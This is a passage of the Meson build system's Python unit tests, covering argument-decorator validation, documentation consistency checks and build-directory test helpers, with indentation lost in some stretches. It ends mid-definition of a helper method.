def test_typed_pos_args_min_optargs_max_exceeded(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', '1', '2'], None)
self.assertEqual(str(cm.exception), 'foo takes at most 2 arguments, but got 3.')
def test_typed_pos_args_optargs_not_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsNone(args[1])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_optargs_some_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str, int])
def _(obj, node, args: T.Tuple[str, T.Optional[str], T.Optional[int]], kwargs) -> None:
self.assertEqual(len(args), 3)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
self.assertEqual(args[1], '1')
self.assertIsNone(args[2])
_(None, mock.Mock(), ['string', '1'], None)
def test_typed_pos_args_optargs_all_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
_(None, mock.Mock(), ['string', '1'], None)
def test_typed_kwarg_basic(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str)
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertIsInstance(kwargs['input'], str)
self.assertEqual(kwargs['input'], 'foo')
_(None, mock.Mock(), [], {'input': 'foo'})
def test_typed_kwarg_missing_required(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertTrue(False) # should be unreachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), [], {})
self.assertEqual(str(cm.exception), 'testfunc is missing required keyword argument "input"')
def test_typed_kwarg_missing_optional(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.Optional[str]]) -> None:
self.assertIsNone(kwargs['input'])
_(None, mock.Mock(), [], {})
def test_typed_kwarg_default(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, default='default'),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertEqual(kwargs['input'], 'default')
_(None, mock.Mock(), [], {})
def test_typed_kwarg_container_valid(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertEqual(kwargs['input'], ['str'])
_(None, mock.Mock(), [], {'input': ['str']})
def test_typed_kwarg_container_invalid(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertTrue(False) # should be unreachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), [], {'input': {}})
self.assertEqual(str(cm.exception), 'testfunc keyword argument "input" container type was "dict", but should have been "list"')
def test_typed_kwarg_contained_invalid(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(dict, str), required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.Dict[str, str]]) -> None:
self.assertTrue(False) # should be unreachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), [], {'input': {'key': 1}})
self.assertEqual(str(cm.exception), 'testfunc keyword argument "input" contained a value of type "int" but should have been "str"')
def test_typed_kwarg_container_listify(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), listify=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertEqual(kwargs['input'], ['str'])
_(None, mock.Mock(), [], {'input': 'str'})
def test_typed_kwarg_container_default_copy(self) -> None:
default: T.List[str] = []
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), listify=True, default=default),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertIsNot(kwargs['input'], default)
_(None, mock.Mock(), [], {})
def test_typed_kwarg_container_pairs(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str, pairs=True), listify=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertEqual(kwargs['input'], ['a', 'b'])
_(None, mock.Mock(), [], {'input': ['a', 'b']})
with self.assertRaises(MesonException) as cm:
_(None, mock.Mock(), [], {'input': ['a']})
self.assertEqual(str(cm.exception), "testfunc keyword argument \"input\" container should be of even length, but is not")
@mock.patch.dict(mesonbuild.mesonlib.project_meson_versions, {})
def test_typed_kwarg_since(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, since='1.0', deprecated='2.0')
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertIsInstance(kwargs['input'], str)
self.assertEqual(kwargs['input'], 'foo')
with mock.patch('sys.stdout', io.StringIO()) as out:
# With Meson 0.1 it should trigger the "introduced" warning but not the "deprecated" warning
mesonbuild.mesonlib.project_meson_versions[''] = '0.1'
_(None, mock.Mock(subproject=''), [], {'input': 'foo'})
self.assertRegex(out.getvalue(), r'WARNING:.*introduced.*input arg in testfunc')
self.assertNotRegex(out.getvalue(), r'WARNING:.*deprecated.*input arg in testfunc')
with mock.patch('sys.stdout', io.StringIO()) as out:
# With Meson 1.5 it shouldn't trigger any warning
mesonbuild.mesonlib.project_meson_versions[''] = '1.5'
_(None, mock.Mock(subproject=''), [], {'input': 'foo'})
self.assertNotRegex(out.getvalue(), r'WARNING:.*')
self.assertNotRegex(out.getvalue(), r'WARNING:.*')
with mock.patch('sys.stdout', io.StringIO()) as out:
# With Meson 2.0 it should trigger the "deprecated" warning but not the "introduced" warning
mesonbuild.mesonlib.project_meson_versions[''] = '2.0'
_(None, mock.Mock(subproject=''), [], {'input': 'foo'})
self.assertRegex(out.getvalue(), r'WARNING:.*deprecated.*input arg in testfunc')
self.assertNotRegex(out.getvalue(), r'WARNING:.*introduced.*input arg in testfunc')
def test_typed_kwarg_validator(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, validator=lambda x: 'invalid!' if x != 'foo' else None)
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
pass
# Should be valid
_(None, mock.Mock(), tuple(), dict(input='foo'))
with self.assertRaises(MesonException) as cm:
_(None, mock.Mock(), tuple(), dict(input='bar'))
self.assertEqual(str(cm.exception), "testfunc keyword argument \"input\" invalid!")
def test_typed_kwarg_convertor(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('native', bool, convertor=lambda n: MachineChoice.BUILD if n else MachineChoice.HOST)
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, MachineChoice]) -> None:
assert isinstance(kwargs['native'], MachineChoice)
_(None, mock.Mock(), tuple(), dict(native=True))
@mock.patch.dict(mesonbuild.mesonlib.project_meson_versions, {'': '1.0'})
def test_typed_kwarg_since_values(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), listify=True, default=[], deprecated_values={'foo': '0.9'}, since_values={'bar': '1.1'}),
KwargInfo('output', ContainerTypeInfo(dict, str), default={}, deprecated_values={'foo': '0.9'}, since_values={'bar': '1.1'}),
KwargInfo(
'mode', str,
validator=lambda x: 'Should be one of "clean", "build", "rebuild"' if x not in {'clean', 'build', 'rebuild', 'deprecated', 'since'} else None,
deprecated_values={'deprecated': '1.0'},
since_values={'since': '1.1'}),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
pass
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'input': ['foo']})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*deprecated since '0.9': "testfunc" keyword argument "input" value "foo".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'input': ['bar']})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*introduced in '1.1': "testfunc" keyword argument "input" value "bar".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'output': {'foo': 'a'}})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*deprecated since '0.9': "testfunc" keyword argument "output" value "foo".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'output': {'bar': 'b'}})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*introduced in '1.1': "testfunc" keyword argument "output" value "bar".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'mode': 'deprecated'})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*deprecated since '1.0': "testfunc" keyword argument "mode" value "deprecated".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'mode': 'since'})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*introduced in '1.1': "testfunc" keyword argument "mode" value "since".*""")
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):

    """Consistency checks between the code and files shipped in the repo
    (documentation, sitemap, syntax highlighting, embedded data)."""

    def test_snippets(self):
        """Release-note snippets must be .md files whose headings (outside of
        code blocks) use exactly two '#' symbols."""
        hashcounter = re.compile('^ *(#)+')
        snippet_dir = Path('docs/markdown/snippets')
        self.assertTrue(snippet_dir.is_dir())
        for f in snippet_dir.glob('*'):
            self.assertTrue(f.is_file())
            if f.parts[-1].endswith('~'):
                # Skip editor backup files.
                continue
            if f.suffix == '.md':
                in_code_block = False
                with f.open() as snippet:
                    for line in snippet:
                        if line.startswith('    '):
                            continue
                        if line.startswith('```'):
                            in_code_block = not in_code_block
                        if in_code_block:
                            continue
                        m = re.match(hashcounter, line)
                        if m:
                            self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
                self.assertFalse(in_code_block, 'Unclosed code block.')
            else:
                if f.name != 'add_release_note_snippets_here':
                    self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)

    def test_compiler_options_documented(self):
        '''
        Test that C and C++ compiler options and base options are documented in
        Builtin-Options.md. Only tests the default compiler for the current
        platform on the CI.
        '''
        md = None
        with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        env = get_fake_env()
        # FIXME: Support other compilers
        cc = env.detect_c_compiler(MachineChoice.HOST)
        cpp = env.detect_cpp_compiler(MachineChoice.HOST)
        for comp in (cc, cpp):
            for opt in comp.get_options():
                self.assertIn(str(opt), md)
            for opt in comp.base_options:
                self.assertIn(str(opt), md)
        self.assertNotIn('b_unknown', md)

    @staticmethod
    def _get_section_content(name, sections, md):
        """Return the text of the section headed *name* from the iterator of
        heading matches *sections* over the document *md*."""
        for section in sections:
            if section and section.group(1) == name:
                try:
                    next_section = next(sections)
                    end = next_section.start()
                except StopIteration:
                    # Last section: runs to the end of the document.
                    end = len(md)
                # Extract the content for this section
                return md[section.end():end]
        raise RuntimeError(f'Could not find "{name}" heading')

    def test_builtin_options_documented(self):
        '''
        Test that universal options and base options are documented in
        Builtin-Options.md.
        '''
        from itertools import tee
        md = None
        with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        found_entries = set()
        sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
        # Extract the content for this section
        content = self._get_section_content("Universal options", sections, md)
        # tee() because each subsection scan consumes the iterator.
        subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
        subcontent1 = self._get_section_content("Directories", subsections[0], content)
        subcontent2 = self._get_section_content("Core options", subsections[1], content)
        for subcontent in (subcontent1, subcontent2):
            # Find the option names
            options = set()
            # Match either a table row or a table heading separator: | ------ |
            rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
            # Skip the header of the first table
            next(rows)
            # Skip the heading separator of the first table
            next(rows)
            for m in rows:
                value = m.group(1)
                # End when the `buildtype` table starts
                if value is None:
                    break
                options.add(value)
            # No option may be documented in more than one subsection.
            self.assertEqual(len(found_entries & options), 0)
            found_entries |= options
        self.assertEqual(found_entries, {
            *[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS],
            *[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE],
        })

        # Check that `buildtype` table inside `Core options` matches how
        # setting of builtin options behaves
        #
        # Find all tables inside this subsection
        tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
        # Get the table we want using the header of the first column
        table = self._get_section_content('buildtype', tables, subcontent2)
        # Get table row data
        rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
        env = get_fake_env()
        for m in rows:
            buildtype, debug, opt = m.groups()
            if debug == 'true':
                debug = True
            elif debug == 'false':
                debug = False
            else:
                raise RuntimeError(f'Invalid debug value {debug!r} in row:\n{m.group()}')
            env.coredata.set_option(OptionKey('buildtype'), buildtype)
            self.assertEqual(env.coredata.options[OptionKey('buildtype')].value, buildtype)
            self.assertEqual(env.coredata.options[OptionKey('optimization')].value, opt)
            self.assertEqual(env.coredata.options[OptionKey('debug')].value, debug)

    def test_cpu_families_documented(self):
        """Every known CPU family must be listed in Reference-tables.md."""
        with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
        content = self._get_section_content("CPU families", sections, md)
        # Find the list entries
        arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
        # Drop the header
        arches = set(arches[1:])
        self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))

    def test_markdown_files_in_sitemap(self):
        '''
        Test that each markdown files in docs/markdown is referenced in sitemap.txt
        '''
        with open("docs/sitemap.txt", encoding='utf-8') as f:
            md = f.read()
        self.assertIsNotNone(md)
        toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
        markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
        exceptions = ['_Sidebar.md']
        for f in markdownfiles:
            if f not in exceptions:
                self.assertIn(f, toc)

    def test_vim_syntax_highlighting(self):
        '''
        Ensure that vim syntax highlighting files were updated for new
        functions in the global namespace in build files.
        '''
        env = get_fake_env()
        interp = Interpreter(FakeBuild(env), mock=True)
        # Pass encoding explicitly; the other doc checks in this class do, and
        # the locale default is not guaranteed to be UTF-8.
        with open('data/syntax-highlighting/vim/syntax/meson.vim', encoding='utf-8') as f:
            res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
            defined = set([a.strip() for a in res.group().split('\\')][1:])
            self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))

    def test_all_functions_defined_in_ast_interpreter(self):
        '''
        Ensure that the all functions defined in the Interpreter are also defined
        in the AstInterpreter (and vice versa).
        '''
        env = get_fake_env()
        interp = Interpreter(FakeBuild(env), mock=True)
        astint = AstInterpreter('.', '', '')
        self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))

    def test_mesondata_is_up_to_date(self):
        """The embedded copies in mesonbuild.mesondata must match the on-disk
        data files (same set of files, same sha256)."""
        from mesonbuild.mesondata import mesondata
        err_msg = textwrap.dedent('''

            ###########################################################
            ### mesonbuild.mesondata is not up-to-date              ###
            ### Please regenerate it by running tools/gen_data.py   ###
            ###########################################################

        ''')

        root_dir = Path(__file__).resolve().parent
        mesonbuild_dir = root_dir / 'mesonbuild'

        data_dirs = mesonbuild_dir.glob('**/data')
        data_files = []  # type: T.List[T.Tuple[str, str]]

        for i in data_dirs:
            for p in i.iterdir():
                data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]

        current_files = set(mesondata.keys())
        scanned_files = {x[0] for x in data_files}

        self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
        errors = []
        for i in data_files:
            if mesondata[i[0]].sha256sum != i[1]:
                errors += [i[0]]
        self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
    """Shared setup, teardown, and helpers for tests that configure and build
    real projects with a backend."""
    prefix = '/usr'  # default --prefix passed to meson setup
    libdir = 'lib'   # default --libdir; subclasses may override
    def setUp(self):
        """Resolve paths and commands for the backend under test, snapshot the
        environment, and create the first build directory."""
        super().setUp()
        self.maxDiff = None
        src_root = os.path.dirname(__file__)
        src_root = os.path.join(os.getcwd(), src_root)
        self.src_root = src_root
        # Get the backend
        self.backend = getattr(Backend, os.environ['MESON_UNIT_TEST_BACKEND'])
        self.meson_args = ['--backend=' + self.backend.name]
        self.meson_native_file = None
        self.meson_cross_file = None
        self.meson_command = python_command + [get_meson_script()]
        self.setup_command = self.meson_command + self.meson_args
        self.mconf_command = self.meson_command + ['configure']
        self.mintro_command = self.meson_command + ['introspect']
        self.wrap_command = self.meson_command + ['wrap']
        self.rewrite_command = self.meson_command + ['rewrite']
        # Backend-specific build commands
        self.build_command, self.clean_command, self.test_command, self.install_command, \
            self.uninstall_command = get_backend_commands(self.backend)
        # Test directories
        self.common_test_dir = os.path.join(src_root, 'test cases/common')
        self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
        self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
        self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
        self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
        self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
        self.objc_test_dir = os.path.join(src_root, 'test cases/objc')
        self.objcpp_test_dir = os.path.join(src_root, 'test cases/objcpp')
        # Misc stuff
        self.orig_env = os.environ.copy()  # restored verbatim in tearDown
        if self.backend is Backend.ninja:
            self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
        else:
            # VS doesn't have a stable output when no changes are done
            # XCode backend is untested with unit tests, help welcome!
            self.no_rebuild_stdout = [f'UNKNOWN BACKEND {self.backend.name!r}']

        self.builddirs = []
        self.new_builddir()
    def change_builddir(self, newdir):
        """Point all derived paths and commands at *newdir* and remember it so
        tearDown can clean it up."""
        self.builddir = newdir
        self.privatedir = os.path.join(self.builddir, 'meson-private')
        self.logdir = os.path.join(self.builddir, 'meson-logs')
        self.installdir = os.path.join(self.builddir, 'install')
        self.distdir = os.path.join(self.builddir, 'meson-dist')
        self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
        self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print(f"{log!r} doesn't exist")
return
with open(log, encoding='utf-8') as f:
print(f.read())
    def tearDown(self):
        """Delete every build dir created by this test and restore the
        environment snapshot taken in setUp."""
        for path in self.builddirs:
            try:
                windows_proof_rmtree(path)
            except FileNotFoundError:
                # Already removed by the test itself; nothing to clean up.
                pass
        os.environ.clear()
        os.environ.update(self.orig_env)
        super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
encoding='utf-8',
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
    def init(self, srcdir, *,
             extra_args=None,
             default_args=True,
             inprocess=False,
             override_envvars=None,
             workdir=None):
        '''
        Configure *srcdir* into self.builddir, either by spawning the meson
        setup command or by running configure in-process.

        Returns the configure stdout for the subprocess path; the in-process
        path returns None on success. Raises unittest.SkipTest when the
        project prints MESON_SKIP_TEST, RuntimeError (in-process) or
        subprocess.CalledProcessError (subprocess) on failure.
        '''
        self.assertPathExists(srcdir)
        # Accept a single string as a convenience for extra_args.
        if extra_args is None:
            extra_args = []
        if not isinstance(extra_args, list):
            extra_args = [extra_args]
        args = [srcdir, self.builddir]
        if default_args:
            args += ['--prefix', self.prefix]
            if self.libdir:
                args += ['--libdir', self.libdir]
            if self.meson_native_file:
                args += ['--native-file', self.meson_native_file]
            if self.meson_cross_file:
                args += ['--cross-file', self.meson_cross_file]
        self.privatedir = os.path.join(self.builddir, 'meson-private')
        if inprocess:
            try:
                (returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
                if 'MESON_SKIP_TEST' in out:
                    raise unittest.SkipTest('Project requested skipping.')
                if returncode != 0:
                    self._print_meson_log()
                    print('Stdout:\n')
                    print(out)
                    print('Stderr:\n')
                    print(err)
                    raise RuntimeError('Configure failed')
            except Exception:
                self._print_meson_log()
                raise
            finally:
                # Close log file to satisfy Windows file locking
                mesonbuild.mlog.shutdown()
                mesonbuild.mlog.log_dir = None
                mesonbuild.mlog.log_file = None
        else:
            try:
                out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
            except unittest.SkipTest:
                raise unittest.SkipTest('Project requested skipping: ' + srcdir)
            except Exception:
                self._print_meson_log()
                raise
            return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'{self.backend.name!r} backend can\'t install files')
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
    def uninstall(self, *, override_envvars=None):
        '''Run the backend's uninstall step in the build directory.'''
        self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
    def run_target(self, target, *, override_envvars=None):
        '''
        Run a Ninja target while printing the stdout and stderr to stdout,
        and also return a copy of it
        '''
        # run_target and build share the same backend invocation, so just
        # delegate.
        return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
    def wipe(self):
        '''Delete the build directory entirely (Windows-safe rmtree).'''
        windows_proof_rmtree(self.builddir)
    def utime(self, f):
        '''Touch *f* so the backend notices the change before the next build.'''
        ensure_backend_detects_changes(self.backend)
        os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'Compiler db not available with {self.backend.name} backend')
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
    def assertPathEqual(self, path1, path2):
        '''
        Handles a lot of platform-specific quirks related to paths such as
        separator, case-sensitivity, etc.
        '''
        # PurePath normalizes separators (and case on Windows) for us.
        self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = f'{path!r} does not end with {basename!r}'
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
    def assertReconfiguredBuildIsNoop(self):
        'Assert that we reconfigured and then there was nothing to do'
        ret = self.build()
        # Reconfiguration is recognized by meson's banner in the output.
        self.assertIn('The Meson build system', ret)
        if self.backend is Backend.ninja:
            # One of the known "nothing to do" lines must appear.
            for line in ret.split('\n'):
                if line in self.no_rebuild_stdout:
                    break
            else:
                raise AssertionError('build was reconfigured, but was not no-op')
        elif self.backend is Backend.vs:
            # Ensure that some target said that no rebuild was done
            # XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
            self.assertIn('ClCompile:\n  All outputs are up-to-date.', ret)
            self.assertIn('Link:\n  All outputs are up-to-date.', ret)
            # Ensure that no targets were built
            self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
            self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
    def assertBuildIsNoop(self):
        '''Assert that running a build does no work at all.'''
        ret = self.build()
        if self.backend is Backend.ninja:
            # The second-to-last output line carries ninja's status message.
            self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
        elif self.backend is Backend.vs:
            # Ensure that some target of each type said that no rebuild was done
            # We always have at least one CustomBuild target for the regen checker
            self.assertIn('CustomBuild:\n  All outputs are up-to-date.', ret)
            self.assertIn('ClCompile:\n  All outputs are up-to-date.', ret)
            self.assertIn('Link:\n  All outputs are up-to-date.', ret)
            # Ensure that no targets were built
            self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
            self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
            self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
    def assertRebuiltTarget(self, target):
        '''Assert that a build relinked *target*.'''
        ret = self.build()
        if self.backend is Backend.ninja:
            self.assertIn(f'Linking target {target}', ret)
        elif self.backend is Backend.vs:
            # Ensure that this target was rebuilt
            linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
            self.assertRegex(ret, linkre)
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
    def assertBuildRelinkedOnlyTarget(self, target):
